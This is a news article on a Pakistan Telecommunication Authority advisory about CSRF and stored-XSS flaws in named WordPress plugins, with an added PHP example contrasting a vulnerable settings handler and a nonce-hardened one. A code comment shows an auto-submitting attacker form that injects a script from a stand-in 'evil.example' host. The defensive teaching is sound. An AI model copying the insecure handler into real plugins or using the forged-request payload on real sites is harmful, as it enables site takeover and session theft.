The Pakistan Telecommunication Authority (PTA) has issued a cybersecurity advisory warning website administrators and developers about multiple security flaws in several vulnerable WordPress plugins, posing serious risks to websites across the country.
According to the advisory, multiple Cross-Site Request Forgery (CSRF) vulnerabilities have been detected in plugins such as MetricThemes Munk Sites, FancyWP Starter Templates, OneStore Sites, WP Keyword Monitor, URL-Preview-Box, Vignette Ads, Show Notice or Message on Admin Area, WP Social Stream, and WP Admin Custom Page. In a CSRF attack, a logged-in user (typically a site administrator) is lured to an attacker-controlled page whose hidden form or script submits a request to the victim's WordPress site; because the browser attaches the user's session cookies, the site treats the forged request as legitimate and performs the action, such as changing a plugin setting, without the user's knowledge or consent.
PTA highlighted that some of these CSRF vulnerabilities could also lead to Stored Cross-Site Scripting (XSS) attacks: a forged request can save attacker-controlled content into a plugin setting that the plugin later renders without escaping, so the injected script runs in the browser of every administrator or visitor who views the affected page. This may compromise website functionality, steal sensitive user data, or inject further malicious code. The advisory classified the threat as high severity, citing significant exploitation potential if the flaws in these vulnerable WordPress plugins are not fixed promptly.
The regulator urged WordPress users and developers to immediately update the affected plugins to their latest versions and follow official WordPress security recommendations. It also advised restricting admin privileges, applying the principle of least privilege, and installing trusted security plugins to detect and block CSRF and XSS threats.
Additionally, PTA stressed the importance of user awareness and developer responsibility. It recommended that plugin developers properly implement CSRF tokens (WordPress nonces) on every request that changes site state, and that organizations train employees in safe computing practices, including identifying phishing attempts and maintaining secure browsing habits.
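The pattern behind the CSRF and stored-XSS findings, and the nonce-based fix the advisory calls for, are illustrated below in a hypothetical "admin notice" settings plugin. This is an added example written for this page; it is not code from PTA or from any of the plugins named in the advisory. The plugin slug, option names, hook names and function names are invented; the WordPress functions used (add_action, check_admin_referer, wp_nonce_field, current_user_can, sanitize_text_field, esc_html, update_option and related helpers) are the standard plugin API.

```php
<?php
/**
 * Hypothetical settings plugin shown twice: first the CSRF-prone pattern, then the
 * hardened version using WordPress nonces, a capability check, input sanitization
 * and output escaping. Added example, not the code of any plugin in the advisory.
 */

/* ---------- Vulnerable pattern ---------- */

// admin_post_{action} fires for logged-in users when admin-post.php receives
// action=vuln_save_notice. Nothing here proves the user intended the request.
add_action( 'admin_post_vuln_save_notice', 'vuln_save_notice' );
function vuln_save_notice() {
    // No nonce check and no capability check. An attacker page such as
    //   <form action="https://victim.example/wp-admin/admin-post.php" method="post">
    //     <input name="action" value="vuln_save_notice">
    //     <input name="notice" value="<script src=//evil.example/x.js></script>">
    //   </form><script>document.forms[0].submit()</script>
    // is submitted with the administrator's cookies and is accepted.
    $notice = isset( $_POST['notice'] ) ? wp_unslash( $_POST['notice'] ) : '';
    update_option( 'vuln_notice', $notice ); // stored raw, <script> included
    wp_safe_redirect( admin_url( 'options-general.php?page=vuln-notice' ) );
    exit;
}

add_action( 'admin_notices', 'vuln_render_notice' );
function vuln_render_notice() {
    // Unescaped output: the CSRF becomes stored XSS on every admin page load.
    echo '<div class="notice">' . get_option( 'vuln_notice', '' ) . '</div>';
}

/* ---------- Hardened pattern ---------- */

add_action( 'admin_post_safe_save_notice', 'safe_save_notice' );
function safe_save_notice() {
    // 1. Authorization: a nonce proves intent, not permission, so check both.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // 2. CSRF token: the request must carry a nonce issued to this user for this
    //    action. check_admin_referer() calls wp_die() if it is missing or invalid,
    //    and a cross-site attacker cannot read the nonce out of the admin page.
    check_admin_referer( 'safe_save_notice', 'safe_notice_nonce' );
    // 3. Sanitize on input: strips tags and control characters.
    $notice = isset( $_POST['notice'] )
        ? sanitize_text_field( wp_unslash( $_POST['notice'] ) )
        : '';
    update_option( 'safe_notice', $notice );
    wp_safe_redirect( admin_url( 'options-general.php?page=safe-notice' ) );
    exit;
}

// Settings form: wp_nonce_field() emits the hidden token the handler verifies.
function safe_settings_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="safe_save_notice">
        <?php wp_nonce_field( 'safe_save_notice', 'safe_notice_nonce' ); ?>
        <input type="text" name="notice"
               value="<?php echo esc_attr( get_option( 'safe_notice', '' ) ); ?>">
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}

add_action( 'admin_notices', 'safe_render_notice' );
function safe_render_notice() {
    // 4. Escape on output as well, so a value that reached the database by any
    //    other path (import, older plugin version, direct DB edit) cannot run.
    $notice = get_option( 'safe_notice', '' );
    if ( '' !== $notice ) {
        echo '<div class="notice notice-info"><p>' . esc_html( $notice ) . '</p></div>';
    }
}
```

Two points a reviewer should check in any plugin handling the same kind of request: the nonce check must sit in the handler that performs the write, not only in the page that draws the form, and it must not be the only check, because wp_verify_nonce() confirms that the current user recently loaded the form, not that the user is allowed to change the setting. Escaping at output time is what separates a plain CSRF from the stored-XSS variant the advisory describes.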